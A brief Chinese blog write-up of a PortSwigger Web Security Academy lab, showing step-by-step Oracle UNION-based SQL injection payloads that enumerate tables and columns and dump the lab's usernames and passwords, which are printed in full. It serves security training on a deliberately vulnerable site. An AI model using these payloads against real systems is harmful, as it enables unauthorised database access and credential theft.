burpsuite靶场----SQL注入10----oracle的union注出数据库内容

burpsuite靶场----SQL注入10----oracle的union注出数据库内容

靶场地址

https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle

正式开始

1.' union select table_name,null from all_tables--

2.有预感敏感信息在这里 USERS_PXZLEL

3.' union select column_name,null from all_tab_columns where table_name='USERS_PXZLEL'--

4.' union select USERNAME_CVLHSG,PASSWORD_OTTWKS from USERS_PXZLEL--

administrator
hgavobv4u5c5tpq6h9dd
carlos
7wp1k3dk43ever7lkew9
wiener
j8a6ssfmn2t5zhh4bnkw
最后登录即可

posted @ 2023-08-15 14:54  BattleofZhongDinghe  阅读(39)  评论(0编辑  收藏  举报